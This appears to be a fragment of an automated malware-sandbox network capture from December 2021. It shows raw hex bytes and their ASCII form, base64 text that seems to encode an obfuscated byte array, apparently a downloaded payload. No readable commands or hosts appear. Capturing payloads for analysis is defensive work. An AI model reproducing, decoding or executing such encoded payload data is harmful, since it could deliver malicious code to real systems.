                                                      2021-12-02 17:26:37 UTC212INData Raw: 4e 55 51 73 59 44 64 46 4c 47 41 77 51 69 78 67 4f 45 51 73 59 44 59 30 4c 47 41 35 4d 79 78 67 52 45 59 73 59 45 5a 44 4c 47 42 46 4d 43 78 67 51 54 63 73 59 45 56 42 4c 47 41 33 52 69 78 67 51 6a 55 73 59 45 59 7a 4c 47 42 46 51 53 78 67 4d 30 59 73 59 44 68 43 4c 47 41 32 4d 43 78 67 52 54 51 73 59 45 59 7a 4c 47 41 30 4e 79 78 67 52 6b 59 73 59 45 59 35 4c 47 41 35 52 69 78 67 4f 54 59 73 59 44 46 46 4c 47 41 7a 52 53 78 67 52 6b 45 73 59 45 52 43 4c 47 41 77 4d 79 78 67 4d 45 49 73 59 45 59 31 4c 47 42 45 51 69 78 67 4f 54 41 73 59 45 4a 44 4c 47 41 7a 4f 53 78 67 51 6b 51 73 59 44 52 45 4c 47 41 78 4f 53 78 67 51 55 59 73 59 45 5a 47 4c 47 42 43 4e 69 78 67 52 6a 4d 73 59 45 56 42 4c 47 41 35 52 69 78 67 4f 44 51 73 59 44 55 33 4c 47 42 42 4e 79 78
                                                      Data Ascii: NUQsYDdFLGAwQixgOEQsYDY0LGA5MyxgREYsYEZDLGBFMCxgQTcsYEVBLGA3RixgQjUsYEYzLGBFQSxgM0YsYDhCLGA2MCxgRTQsYEYzLGA0NyxgRkYsYEY5LGA5RixgOTYsYDFFLGAzRSxgRkEsYERCLGAwMyxgMEIsYEY1LGBEQixgOTAsYEJDLGAzOSxgQkQsYDRELGAxOSxgQUYsYEZGLGBCNixgRjMsYEVBLGA5RixgODQsYDU3LGBBNyx
                                                      2021-12-02 17:26:37 UTC224INData Raw: 7a 4c 47 41 78 51 69 78 67 52 6b 51 73 59 44 46 42 4c 47 41 79 4e 43 78 67 4e 6a 59 73 59 45 4a 47 4c 47 42 44 4e 69 78 67 4e 6b 59 73 59 45 4d 34 4c 47 42 43 51 79 78 67 52 6b 55 73 59 44 56 47 4c 47 42 47 52 43 78 67 52 44 49 73 59 44 6c 47 4c 47 42 47 52 53 78 67 52 45 55 73 59 44 5a 47 4c 47 42 47 4e 43 78 67 4d 55 49 73 59 45 55 30 4c 47 42 46 4e 79 78 67 52 54 6b 73 59 44 68 47 4c 47 42 47 52 69 78 67 52 54 55 73 59 44 56 47 4c 47 42 47 52 43 78 67 4e 55 59 73 59 45 55 35 4c 47 42 46 52 69 78 67 52 6a 55 73 59 44 55 7a 4c 47 42 43 52 69 78 67 52 6a 4d 73 59 44 59 78 4c 47 42 47 51 53 78 67 4e 30 49 73 59 45 5a 44 4c 47 41 79 52 43 78 67 4e 30 59 73 59 45 59 30 4c 47 41 7a 52 69 78 67 52 6a 59 73 59 44 55 7a 4c 47 41 7a 52 69 78 67 4f 54 55 73 59 45
                                                      Data Ascii: zLGAxQixgRkQsYDFBLGAyNCxgNjYsYEJGLGBDNixgNkYsYEM4LGBCQyxgRkUsYDVGLGBGRCxgRDIsYDlGLGBGRSxgREUsYDZGLGBGNCxgMUIsYEU0LGBFNyxgRTksYDhGLGBGRixgRTUsYDVGLGBGRCxgNUYsYEU5LGBFRixgRjUsYDUzLGBCRixgRjMsYDYxLGBGQSxgN0IsYEZDLGAyRCxgN0YsYEY0LGAzRixgRjYsYDUzLGAzRixgOTUsYE
                                                      2021-12-02 17:26:37 UTC228INData Raw: 51 30 4d 73 59 44 64 47 4c 47 41 32 52 69 78 67 4f 45 49 73 59 45 59 79 4c 47 41 77 4e 79 78 67 52 6b 59 73 59 45 55 30 4c 47 41 30 52 69 78 67 4e 7a 45 73 59 44 64 47 4c 47 41 78 4e 43 78 67 4e 44 63 73 59 45 5a 45 4c 47 42 43 4d 79 78 67 4f 55 51 73 59 45 59 33 4c 47 42 47 52 53 78 67 4d 6b 45 73 59 45 4a 44 4c 47 42 47 4e 79 78 67 52 45 59 73 59 45 5a 45 4c 47 41 35 52 43 78 67 51 6b 59 73 59 45 59 30 4c 47 41 78 52 69 78 67 4e 44 6b 73 59 44 64 47 4c 47 42 46 4d 79 78 67 51 7a 6b 73 59 45 4a 47 4c 47 42 46 4d 69 78 67 4e 7a 4d 73 59 45 55 34 4c 47 41 32 52 69 78 67 4f 54 6b 73 59 44 55 77 4c 47 41 31 4e 69 78 67 4f 55 51 73 59 44 63 7a 4c 47 41 78 52 43 78 67 51 6a 51 73 59 44 59 34 4c 47 42 47 4d 53 78 67 4e 54 4d 73 59 45 59 31 4c 47 41 33 52 69 78
                                                      Data Ascii: Q0MsYDdGLGA2RixgOEIsYEYyLGAwNyxgRkYsYEU0LGA0RixgNzEsYDdGLGAxNCxgNDcsYEZELGBCMyxgOUQsYEY3LGBGRSxgMkEsYEJDLGBGNyxgREYsYEZELGA5RCxgQkYsYEY0LGAxRixgNDksYDdGLGBFMyxgQzksYEJGLGBFMixgNzMsYEU4LGA2RixgOTksYDUwLGA1NixgOUQsYDczLGAxRCxgQjQsYDY4LGBGMSxgNTMsYEY1LGA3Rix
                                                      2021-12-02 17:26:37 UTC244INData Raw: 4f 54 63 73 59 44 56 47 4c 47 42 42 4e 79 78 67 4d 6a 63 73 59 45 5a 47 4c 47 42 45 4f 53 78 67 52 6b 59 73 59 45 59 78 4c 47 41 7a 4e 79 78 67 52 6b 49 73 59 44 59 77 4c 47 42 43 52 53 78 67 52 6a 55 73 59 44 52 43 4c 47 42 47 52 69 78 67 4e 44 63 73 59 44 55 35 4c 47 41 33 51 53 78 67 52 6b 51 73 59 44 64 43 4c 47 41 32 4f 43 78 67 52 44 67 73 59 45 4e 44 4c 47 41 30 4e 69 78 67 51 6b 59 73 59 44 49 31 4c 47 41 35 4d 43 78 67 51 54 63 73 59 45 49 77 4c 47 42 46 4e 43 78 67 4e 6b 59 73 59 45 56 47 4c 47 41 77 4d 43 78 67 52 6b 55 73 59 44 59 33 4c 47 41 32 4d 43 78 67 4e 7a 4d 73 59 45 5a 47 4c 47 42 42 52 69 78 67 4e 45 59 73 59 45 5a 47 4c 47 41 34 52 43 78 67 52 55 59 73 59 45 45 32 4c 47 41 33 52 69 78 67 52 6a 6b 73 59 44 6b 33 4c 47 41 33 52 69 78
                                                      Data Ascii: OTcsYDVGLGBBNyxgMjcsYEZGLGBEOSxgRkYsYEYxLGAzNyxgRkIsYDYwLGBCRSxgRjUsYDRCLGBGRixgNDcsYDU5LGA3QSxgRkQsYDdCLGA2OCxgRDgsYENDLGA0NixgQkYsYDI1LGA5MCxgQTcsYEIwLGBFNCxgNkYsYEVGLGAwMCxgRkUsYDY3LGA2MCxgNzMsYEZGLGBBRixgNEYsYEZGLGA4RCxgRUYsYEE2LGA3RixgRjksYDk3LGA3Rix
                                                      2021-12-02 17:26:37 UTC256INData Raw: 77 4c 47 42 45 52 69 78 67 4f 45 59 73 59 44 55 32 4c 47 42 46 4f 43 78 67 4d 30 45 73 59 44 41 77 4c 47 42 47 52 53 78 67 4e 54 6b 73 59 44 42 42 4c 47 41 34 4e 79 78 67 4e 30 59 73 59 45 59 7a 4c 47 42 45 52 69 78 67 4f 44 6b 73 59 45 45 34 4c 47 42 47 52 43 78 67 4e 6a 63 73 59 44 64 47 4c 47 42 47 52 69 78 67 4e 30 59 73 59 45 5a 46 4c 47 41 35 4e 79 78 67 4e 44 45 73 59 45 56 45 4c 47 41 7a 4e 79 78 67 52 54 63 73 59 45 4a 47 4c 47 42 42 52 69 78 67 4f 54 63 73 59 44 4d 31 4c 47 41 32 4d 69 78 67 4e 6b 45 73 59 44 64 47 4c 47 41 33 4f 53 78 67 52 45 55 73 59 45 45 33 4c 47 42 47 4e 69 78 67 4f 55 59 73 59 44 64 44 4c 47 41 78 52 53 78 67 51 54 55 73 59 45 59 32 4c 47 42 44 52 69 78 67 4e 6a 41 73 59 45 55 78 4c 47 42 46 52 53 78 67 52 55 55 73 59 44
                                                      Data Ascii: wLGBERixgOEYsYDU2LGBFOCxgM0EsYDAwLGBGRSxgNTksYDBBLGA4NyxgN0YsYEYzLGBERixgODksYEE4LGBGRCxgNjcsYDdGLGBGRixgN0YsYEZFLGA5NyxgNDEsYEVELGAzNyxgRTcsYEJGLGBBRixgOTcsYDM1LGA2MixgNkEsYDdGLGA3OSxgREUsYEE3LGBGNixgOUYsYDdDLGAxRSxgQTUsYEY2LGBDRixgNjAsYEUxLGBFRSxgRUUsYD
                                                      2021-12-02 17:26:37 UTC272INData Raw: 47 4c 47 42 43 4f 53 78 67 52 44 45 73 59 45 59 78 4c 47 42 46 52 69 78 67 52 6a 67 73 59 44 63 33 4c 47 41 35 52 43 78 67 51 54 55 73 59 44 59 33 4c 47 42 43 52 69 78 67 4e 6a 45 73 59 45 59 78 4c 47 42 43 52 69 78 67 52 6a 67 73 59 45 56 47 4c 47 41 35 51 69 78 67 4e 55 4d 73 59 44 59 30 4c 47 41 33 4e 79 78 67 4f 45 51 73 59 45 4d 31 4c 47 42 46 4e 53 78 67 4d 6a 49 73 59 45 5a 43 4c 47 41 34 4d 69 78 67 4e 44 49 73 59 45 49 35 4c 47 42 44 4f 43 78 67 51 6b 59 73 59 45 49 34 4c 47 42 45 4d 79 78 67 51 7a 45 73 59 44 56 47 4c 47 41 34 51 69 78 67 4e 55 4d 73 59 45 55 30 4c 47 41 33 52 69 78 67 52 6a 6b 73 59 44 5a 43 4c 47 42 43 52 43 78 67 4e 30 4d 73 59 44 6b 77 4c 47 42 47 52 53 78 67 51 54 59 73 59 44 64 47 4c 47 42 46 4d 53 78 67 51 6b 59 73 59 45
                                                      Data Ascii: GLGBCOSxgRDEsYEYxLGBFRixgRjgsYDc3LGA5RCxgQTUsYDY3LGBCRixgNjEsYEYxLGBCRixgRjgsYEVGLGA5QixgNUMsYDY0LGA3NyxgOEQsYEM1LGBFNSxgMjIsYEZCLGA4MixgNDIsYEI5LGBDOCxgQkYsYEI4LGBEMyxgQzEsYDVGLGA4QixgNUMsYEU0LGA3RixgRjksYDZCLGBCRCxgN0MsYDkwLGBGRSxgQTYsYDdGLGBFMSxgQkYsYE
                                                      2021-12-02 17:26:37 UTC288INData Raw: 34 4c 47 42 47 4d 69 78 67 51 54 45 73 59 44 6b 34 4c 47 42 46 4e 53 78 67 51 6a 59 73 59 45 4e 47 4c 47 41 7a 51 53 78 67 4e 6b 59 73 59 44 4e 44 4c 47 42 44 4e 43 78 67 4d 55 49 73 59 45 4a 47 4c 47 42 46 4d 53 78 67 51 55 59 73 59 45 5a 44 4c 47 41 35 4e 53 78 67 4f 55 59 73 59 45 45 30 4c 47 42 47 52 69 78 67 52 55 55 73 59 45 4a 47 4c 47 41 33 52 43 78 67 4d 54 51 73 59 45 46 44 4c 47 41 7a 4e 53 78 67 4f 55 45 73 59 45 4a 44 4c 47 42 45 52 53 78 67 52 55 49 73 59 45 4e 46 4c 47 41 78 51 69 78 67 51 6b 59 73 59 44 4e 46 4c 47 42 45 52 53 78 67 52 6a 67 73 59 44 4e 45 4c 47 42 47 52 53 78 67 52 54 63 73 59 45 4a 47 4c 47 42 46 51 79 78 67 4e 45 59 73 59 44 52 46 4c 47 41 30 52 69 78 67 4e 7a 59 73 59 44 64 46 4c 47 42 42 51 69 78 67 52 44 59 73 59 44
                                                      Data Ascii: 4LGBGMixgQTEsYDk4LGBFNSxgQjYsYENGLGAzQSxgNkYsYDNDLGBDNCxgMUIsYEJGLGBFMSxgQUYsYEZDLGA5NSxgOUYsYEE0LGBGRixgRUUsYEJGLGA3RCxgMTQsYEFDLGAzNSxgOUEsYEJDLGBERSxgRUIsYENFLGAxQixgQkYsYDNFLGBERSxgRjgsYDNELGBGRSxgRTcsYEJGLGBFQyxgNEYsYDRFLGA0RixgNzYsYDdFLGBBQixgRDYsYD
                                                      2021-12-02 17:26:37 UTC304INData Raw: 44 4c 47 42 46 52 69 78 67 52 6b 55 73 59 44 67 33 4c 47 42 47 52 43 78 67 51 30 55 73 59 44 41 32 4c 47 42 45 4e 69 78 67 4f 54 49 73 59 45 5a 47 4c 47 42 46 4d 79 78 67 4e 45 55 73 59 44 55 33 4c 47 42 43 52 69 78 67 4d 55 49 73 59 45 4a 42 4c 47 42 47 51 53 78 67 4f 55 59 73 59 45 4d 7a 4c 47 42 42 52 53 78 67 51 6b 55 73 59 44 6b 7a 4c 47 42 45 4e 69 78 67 4e 55 49 73 59 45 5a 47 4c 47 41 35 4d 53 78 67 51 7a 59 73 59 44 4a 45 4c 47 41 79 52 53 78 67 4d 55 51 73 59 45 5a 46 4c 47 42 43 52 69 78 67 4d 6a 4d 73 59 45 4a 43 4c 47 42 47 51 53 78 67 4e 6a 63 73 59 45 46 45 4c 47 41 33 52 53 78 67 52 55 51 73 59 45 4a 47 4c 47 41 7a 4e 43 78 67 4e 30 51 73 59 45 59 33 4c 47 41 78 4e 79 78 67 52 6b 51 73 59 44 49 7a 4c 47 42 47 52 69 78 67 4f 54 67 73 59 45
                                                      Data Ascii: DLGBFRixgRkUsYDg3LGBGRCxgQ0UsYDA2LGBENixgOTIsYEZGLGBFMyxgNEUsYDU3LGBCRixgMUIsYEJBLGBGQSxgOUYsYEMzLGBBRSxgQkUsYDkzLGBENixgNUIsYEZGLGA5MSxgQzYsYDJELGAyRSxgMUQsYEZFLGBCRixgMjMsYEJCLGBGQSxgNjcsYEFELGA3RSxgRUQsYEJGLGAzNCxgN0QsYEY3LGAxNyxgRkQsYDIzLGBGRixgOTgsYE
                                                      2021-12-02 17:26:37 UTC320INData Raw: 44 4c 47 41 7a 4f 53 78 67 4e 7a 67 73 59 45 55 33 4c 47 41 33 52 69 78 67 52 6a 6b 73 59 45 4e 43 4c 47 41 33 52 53 78 67 51 30 49 73 59 44 4e 47 4c 47 41 79 4e 69 78 67 52 6b 51 73 59 45 49 78 4c 47 42 47 52 69 78 67 52 6a 49 73 59 44 4e 47 4c 47 42 47 51 69 78 67 52 44 63 73 59 45 5a 45 4c 47 41 33 4e 79 78 67 52 45 4d 73 59 44 52 42 4c 47 42 46 51 53 78 67 4d 30 59 73 59 45 52 46 4c 47 41 33 4f 53 78 67 52 54 63 73 59 44 46 44 4c 47 42 46 52 69 78 67 4e 30 4d 73 59 45 59 78 4c 47 41 35 4e 79 78 67 52 6b 59 73 59 45 55 35 4c 47 42 47 52 69 78 67 4e 45 45 73 59 45 5a 42 4c 47 41 33 4e 79 78 67 4e 30 59 73 59 45 59 32 4c 47 41 31 4e 79 78 67 52 6b 55 73 59 45 4d 32 4c 47 42 47 52 53 78 67 4d 30 49 73 59 45 4d 78 4c 47 41 31 4d 69 78 67 52 6b 51 73 59 45
                                                      Data Ascii: DLGAzOSxgNzgsYEU3LGA3RixgRjksYENCLGA3RSxgQ0IsYDNGLGAyNixgRkQsYEIxLGBGRixgRjIsYDNGLGBGQixgRDcsYEZELGA3NyxgREMsYDRBLGBFQSxgM0YsYERFLGA3OSxgRTcsYDFDLGBFRixgN0MsYEYxLGA5NyxgRkYsYEU5LGBGRixgNEEsYEZBLGA3NyxgN0YsYEY2LGA1NyxgRkUsYEM2LGBGRSxgM0IsYEMxLGA1MixgRkQsYE
                                                      2021-12-02 17:26:37 UTC336INData Raw: 47 4c 47 42 46 4f 43 78 67 51 54 55 73 59 45 4a 47 4c 47 41 34 4d 69 78 67 4e 30 55 73 59 45 52 47 4c 47 42 42 4d 53 78 67 4f 55 59 73 59 45 4a 47 4c 47 41 79 52 69 78 67 51 6b 51 73 59 45 59 33 4c 47 41 30 4e 79 78 67 52 44 49 73 59 44 59 33 4c 47 42 47 52 69 78 67 4d 7a 59 73 59 45 4d 78 4c 47 42 47 51 79 78 67 4e 6b 51 73 59 45 45 34 4c 47 42 47 52 43 78 67 52 55 59 73 59 44 51 79 4c 47 42 43 4d 43 78 67 4e 30 55 73 59 44 49 31 4c 47 42 46 4d 53 78 67 52 6a 45 73 59 44 6c 43 4c 47 42 47 52 69 78 67 4d 30 45 73 59 45 4a 47 4c 47 42 44 4e 69 78 67 51 55 59 73 59 45 59 78 4c 47 42 42 51 69 78 67 52 54 67 73 59 44 6c 45 4c 47 41 33 52 69 78 67 4f 44 67 73 59 45 4a 46 4c 47 42 47 52 69 78 67 51 6a 4d 73 59 45 55 34 4c 47 42 46 52 69 78 67 52 6b 59 73 59 44
                                                      Data Ascii: GLGBFOCxgQTUsYEJGLGA4MixgN0UsYERGLGBBMSxgOUYsYEJGLGAyRixgQkQsYEY3LGA0NyxgRDIsYDY3LGBGRixgMzYsYEMxLGBGQyxgNkQsYEE4LGBGRCxgRUYsYDQyLGBCMCxgN0UsYDI1LGBFMSxgRjEsYDlCLGBGRixgM0EsYEJGLGBDNixgQUYsYEYxLGBBQixgRTgsYDlELGA3RixgODgsYEJFLGBGRixgQjMsYEU4LGBFRixgRkYsYD
                                                      2021-12-02 17:26:37 UTC352INData Raw: 30 4c 47 41 30 4e 79 78 67 52 6b 49 73 59 44 63 33 4c 47 41 33 4e 79 78 67 51 7a 59 73 59 45 59 79 4c 47 42 42 4e 79 78 67 52 54 41 73 59 45 55 31 4c 47 41 31 52 69 78 67 4d 7a 6b 73 59 45 5a 47 4c 47 42 46 4e 79 78 67 52 6b 55 73 59 45 52 46 4c 47 42 47 4e 43 78 67 4d 6b 59 73 59 45 59 35 4c 47 41 32 52 43 78 67 4e 30 59 73 59 44 6c 45 4c 47 41 34 4d 43 78 67 4e 44 63 73 59 44 41 32 4c 47 41 33 51 79 78 67 51 54 55 73 59 44 64 47 4c 47 42 43 4d 53 78 67 4d 44 4d 73 59 45 55 77 4c 47 41 79 4e 79 78 67 4d 44 41 73 59 45 55 77 4c 47 42 45 52 69 78 67 52 6b 45 73 59 44 6c 45 4c 47 41 35 4e 79 78 67 51 6b 59 73 59 44 63 7a 4c 47 42 47 51 53 78 67 52 6b 45 73 59 45 51 33 4c 47 42 47 4f 43 78 67 4e 6b 45 73 59 45 49 79 4c 47 42 44 4f 53 78 67 51 6a 59 73 59 45
                                                      Data Ascii: 0LGA0NyxgRkIsYDc3LGA3NyxgQzYsYEYyLGBBNyxgRTAsYEU1LGA1RixgMzksYEZGLGBFNyxgRkUsYERFLGBGNCxgMkYsYEY5LGA2RCxgN0YsYDlELGA4MCxgNDcsYDA2LGA3QyxgQTUsYDdGLGBCMSxgMDMsYEUwLGAyNyxgMDAsYEUwLGBERixgRkEsYDlELGA5NyxgQkYsYDczLGBGQSxgRkEsYEQ3LGBGOCxgNkEsYEIyLGBDOSxgQjYsYE
                                                      2021-12-02 17:26:37 UTC368INData Raw: 47 4c 47 42 46 4f 43 78 67 51 6b 59 73 59 45 5a 47 4c 47 41 31 4e 79 78 67 52 6b 4d 73 59 44 63 33 4c 47 42 42 4d 69 78 67 4f 44 6b 73 59 45 56 47 4c 47 42 45 52 69 78 67 52 6a 67 73 59 44 4a 47 4c 47 41 77 4f 53 78 67 4e 55 59 73 59 44 56 47 4c 47 41 79 4d 53 78 67 4e 54 51 73 59 45 4d 31 4c 47 41 78 4d 69 78 67 51 7a 63 73 59 45 59 35 4c 47 42 45 52 69 78 67 52 6a 55 73 59 45 4a 43 4c 47 42 47 52 43 78 67 52 6b 45 73 59 44 59 77 4c 47 42 42 4d 69 78 67 51 30 59 73 59 45 4a 47 4c 47 42 47 51 79 78 67 4d 55 49 73 59 44 64 47 4c 47 42 45 4d 43 78 67 4e 6a 45 73 59 45 45 79 4c 47 42 45 52 69 78 67 4d 55 51 73 59 45 56 47 4c 47 41 33 4e 43 78 67 4f 54 67 73 59 45 55 34 4c 47 41 77 4d 69 78 67 4f 55 59 73 59 45 59 31 4c 47 41 35 4f 53 78 67 52 54 67 73 59 44
                                                      Data Ascii: GLGBFOCxgQkYsYEZGLGA1NyxgRkMsYDc3LGBBMixgODksYEVGLGBERixgRjgsYDJGLGAwOSxgNUYsYDVGLGAyMSxgNTQsYEM1LGAxMixgQzcsYEY5LGBERixgRjUsYEJCLGBGRCxgRkEsYDYwLGBBMixgQ0YsYEJGLGBGQyxgMUIsYDdGLGBEMCxgNjEsYEEyLGBERixgMUQsYEVGLGA3NCxgOTgsYEU4LGAwMixgOUYsYEY1LGA5OSxgRTgsYD
                                                      2021-12-02 17:26:37 UTC384INData Raw: 78 4c 47 41 77 52 69 78 67 51 30 51 73 59 44 59 32 4c 47 42 46 52 69 78 67 52 6b 59 73 59 45 4e 42 4c 47 41 78 52 69 78 67 4e 6a 4d 73 59 45 49 7a 4c 47 41 30 52 69 78 67 52 44 6b 73 59 45 5a 43 4c 47 41 7a 52 69 78 67 51 6a 63 73 59 45 59 7a 4c 47 42 47 4d 69 78 67 4d 30 59 73 59 44 67 31 4c 47 42 42 51 79 78 67 52 54 67 73 59 45 4a 47 4c 47 42 47 4e 69 78 67 4e 6b 59 73 59 45 5a 45 4c 47 41 33 4d 79 78 67 4e 30 59 73 59 44 55 31 4c 47 42 47 51 53 78 67 4e 6a 63 73 59 45 5a 46 4c 47 42 47 4e 69 78 67 4d 30 59 73 59 45 59 7a 4c 47 42 43 4d 53 78 67 52 6b 59 73 59 44 4d 79 4c 47 41 34 4d 69 78 67 4f 54 6b 73 59 45 4d 7a 4c 47 41 31 52 69 78 67 52 6b 55 73 59 44 5a 43 4c 47 42 47 4d 53 78 67 4f 45 49 73 59 44 45 30 4c 47 42 44 52 69 78 67 52 6b 4d 73 59 44
                                                      Data Ascii: xLGAwRixgQ0QsYDY2LGBFRixgRkYsYENBLGAxRixgNjMsYEIzLGA0RixgRDksYEZCLGAzRixgQjcsYEYzLGBGMixgM0YsYDg1LGBBQyxgRTgsYEJGLGBGNixgNkYsYEZELGA3MyxgN0YsYDU1LGBGQSxgNjcsYEZFLGBGNixgM0YsYEYzLGBCMSxgRkYsYDMyLGA4MixgOTksYEMzLGA1RixgRkUsYDZCLGBGMSxgOEIsYDE0LGBDRixgRkMsYD
                                                      2021-12-02 17:26:37 UTC400INData Raw: 31 4c 47 41 32 4d 79 78 67 52 6a 6b 73 59 44 63 35 4c 47 42 47 51 53 78 67 52 45 59 73 59 45 5a 44 4c 47 42 47 4f 53 78 67 52 6b 49 73 59 45 5a 47 4c 47 41 32 4d 53 78 67 52 6b 45 73 59 44 51 33 4c 47 42 47 52 69 78 67 4e 6a 45 73 59 44 4a 47 4c 47 42 47 52 69 78 67 51 7a 41 73 59 45 52 47 4c 47 42 47 51 69 78 67 52 6a 63 73 59 44 4d 35 4c 47 41 7a 4e 79 78 67 4e 6b 49 73 59 44 4a 42 4c 47 41 33 52 69 78 67 4e 7a 41 73 59 44 41 33 4c 47 42 44 4e 43 78 67 4d 30 59 73 59 44 52 47 4c 47 42 45 4f 53 78 67 51 7a 63 73 59 45 5a 42 4c 47 42 44 52 69 78 67 4d 45 4d 73 59 45 55 35 4c 47 41 33 4d 43 78 67 4f 55 4d 73 59 45 5a 46 4c 47 42 42 4f 53 78 67 51 7a 55 73 59 44 5a 47 4c 47 42 47 4e 69 78 67 4f 44 63 73 59 44 63 32 4c 47 41 35 4d 79 78 67 51 55 4d 73 59 44
                                                      Data Ascii: 1LGA2MyxgRjksYDc5LGBGQSxgREYsYEZDLGBGOSxgRkIsYEZGLGA2MSxgRkEsYDQ3LGBGRixgNjEsYDJGLGBGRixgQzAsYERGLGBGQixgRjcsYDM5LGAzNyxgNkIsYDJBLGA3RixgNzAsYDA3LGBDNCxgM0YsYDRGLGBEOSxgQzcsYEZBLGBDRixgMEMsYEU5LGA3MCxgOUMsYEZFLGBBOSxgQzUsYDZGLGBGNixgODcsYDc2LGA5MyxgQUMsYD
                                                      2021-12-02 17:26:37 UTC416INData Raw: 30 4c 47 42 47 52 43 78 67 52 55 51 73 59 44 64 47 4c 47 42 44 52 69 78 67 4d 30 59 73 59 44 4d 32 4c 47 42 46 4d 43 78 67 51 30 55 73 59 44 67 78 4c 47 41 78 51 79 78 67 52 45 55 73 59 44 59 33 4c 47 41 78 52 43 78 67 4f 44 51 73 59 45 5a 46 4c 47 41 32 4d 69 78 67 4d 44 41 73 59 45 59 34 4c 47 41 35 52 43 78 67 52 6b 55 73 59 44 68 42 4c 47 41 7a 52 69 78 67 52 6a 51 73 59 44 5a 47 4c 47 41 30 4f 53 78 67 4f 45 59 73 59 45 5a 46 4c 47 41 35 4f 43 78 67 4f 44 55 73 59 45 45 33 4c 47 41 33 52 43 78 67 4f 44 59 73 59 45 51 32 4c 47 41 34 4f 53 78 67 51 6b 55 73 59 45 56 42 4c 47 42 43 51 79 78 67 4f 55 59 73 59 45 55 78 4c 47 42 47 52 43 78 67 4d 30 59 73 59 45 55 35 4c 47 42 45 4e 53 78 67 4e 55 59 73 59 45 5a 44 4c 47 41 7a 4d 69 78 67 52 6b 51 73 59 44
                                                      Data Ascii: 0LGBGRCxgRUQsYDdGLGBDRixgM0YsYDM2LGBFMCxgQ0UsYDgxLGAxQyxgREUsYDY3LGAxRCxgODQsYEZFLGA2MixgMDAsYEY4LGA5RCxgRkUsYDhBLGAzRixgRjQsYDZGLGA0OSxgOEYsYEZFLGA5OCxgODUsYEE3LGA3RCxgODYsYEQ2LGA4OSxgQkUsYEVBLGBCQyxgOUYsYEUxLGBGRCxgM0YsYEU5LGBENSxgNUYsYEZDLGAzMixgRkQsYD
                                                      2021-12-02 17:26:37 UTC432INData Raw: 44 4c 47 42 47 51 79 78 67 51 54 63 73 59 44 64 47 4c 47 42 42 4d 79 78 67 4e 55 59 73 59 45 55 7a 4c 47 42 45 4e 79 78 67 4d 54 67 73 59 45 51 78 4c 47 42 47 52 69 78 67 51 6b 59 73 59 45 59 31 4c 47 41 31 51 69 78 67 52 44 49 73 59 45 56 47 4c 47 41 78 4e 43 78 67 51 7a 59 73 59 44 64 45 4c 47 41 35 51 69 78 67 4e 7a 49 73 59 44 52 46 4c 47 41 33 4d 79 78 67 52 54 51 73 59 44 45 33 4c 47 42 46 4f 53 78 67 52 6a 63 73 59 45 4a 47 4c 47 41 34 4f 53 78 67 52 6a 49 73 59 44 6b 78 4c 47 42 47 52 69 78 67 4d 6a 63 73 59 45 55 31 4c 47 41 78 4e 79 78 67 52 6b 59 73 59 45 55 30 4c 47 41 31 52 69 78 67 52 6b 49 73 59 45 51 33 4c 47 42 47 4f 43 78 67 4d 7a 55 73 59 45 5a 46 4c 47 41 33 52 53 78 67 4f 44 49 73 59 45 59 7a 4c 47 42 47 51 69 78 67 4e 54 45 73 59 44
                                                      Data Ascii: DLGBGQyxgQTcsYDdGLGBBMyxgNUYsYEUzLGBENyxgMTgsYEQxLGBGRixgQkYsYEY1LGA1QixgRDIsYEVGLGAxNCxgQzYsYDdELGA5QixgNzIsYDRFLGA3MyxgRTQsYDE3LGBFOSxgRjcsYEJGLGA4OSxgRjIsYDkxLGBGRixgMjcsYEU1LGAxNyxgRkYsYEU0LGA1RixgRkIsYEQ3LGBGOCxgMzUsYEZFLGA3RSxgODIsYEYzLGBGQixgNTEsYD
                                                      2021-12-02 17:26:37 UTC448INData Raw: 45 4c 47 41 78 4e 79 78 67 52 6b 55 73 59 45 4d 33 4c 47 41 33 52 69 78 67 4e 6a 67 73 59 45 51 30 4c 47 41 77 52 53 78 67 4d 30 4d 73 59 45 59 35 4c 47 41 34 52 43 78 67 4d 7a 6b 73 59 45 4a 43 4c 47 41 30 4f 43 78 67 4e 7a 59 73 59 45 55 77 4c 47 41 35 4d 79 78 67 4d 45 55 73 59 45 51 34 4c 47 41 7a 4f 53 78 67 4e 54 49 73 59 45 45 30 4c 47 41 79 4e 79 78 67 51 7a 45 73 59 44 67 33 4c 47 41 78 4e 43 78 67 51 54 49 73 59 44 46 45 4c 47 42 47 52 43 78 67 52 55 55 73 59 44 6c 47 4c 47 42 47 52 53 78 67 52 6a 4d 73 59 45 52 45 4c 47 41 78 4d 43 78 67 52 55 51 73 59 44 41 34 4c 47 42 45 52 43 78 67 52 6b 4d 73 59 45 4a 45 4c 47 42 47 52 69 78 67 52 6b 49 73 59 45 55 79 4c 47 41 31 52 53 78 67 4d 30 45 73 59 45 5a 43 4c 47 41 32 4e 53 78 67 4f 45 59 73 59 45
                                                      Data Ascii: ELGAxNyxgRkUsYEM3LGA3RixgNjgsYEQ0LGAwRSxgM0MsYEY5LGA4RCxgMzksYEJCLGA0OCxgNzYsYEUwLGA5MyxgMEUsYEQ4LGAzOSxgNTIsYEE0LGAyNyxgQzEsYDg3LGAxNCxgQTIsYDFELGBGRCxgRUUsYDlGLGBGRSxgRjMsYERELGAxMCxgRUQsYDA4LGBERCxgRkMsYEJELGBGRixgRkIsYEUyLGA1RSxgM0EsYEZCLGA2NSxgOEYsYE
                                                      2021-12-02 17:26:37 UTC464INData Raw: 47 4c 47 42 42 4e 79 78 67 51 54 63 73 59 44 4d 35 4c 47 41 77 4d 43 78 67 52 6b 4d 73 59 44 63 78 4c 47 41 31 52 69 78 67 52 6b 51 73 59 44 46 43 4c 47 42 47 52 69 78 67 4e 54 41 73 59 45 5a 42 4c 47 42 46 4d 79 78 67 51 6b 59 73 59 45 51 35 4c 47 42 46 52 69 78 67 52 6b 55 73 59 45 52 47 4c 47 42 47 4f 53 78 67 4d 44 41 73 59 44 41 32 4c 47 41 35 51 79 78 67 51 55 45 73 59 44 64 47 4c 47 42 43 4e 53 78 67 4d 44 4d 73 59 45 55 77 4c 47 41 32 4d 79 78 67 4d 44 41 73 59 45 59 34 4c 47 41 35 51 69 78 67 52 6b 55 73 59 45 51 30 4c 47 42 43 52 69 78 67 52 6b 59 73 59 44 4e 47 4c 47 41 30 4f 53 78 67 4e 55 59 73 59 44 4e 46 4c 47 42 43 52 69 78 67 52 6a 4d 73 59 45 4d 30 4c 47 41 77 4e 79 78 67 4d 54 41 73 59 45 59 7a 4c 47 41 78 4d 43 78 67 52 6b 55 73 59 45
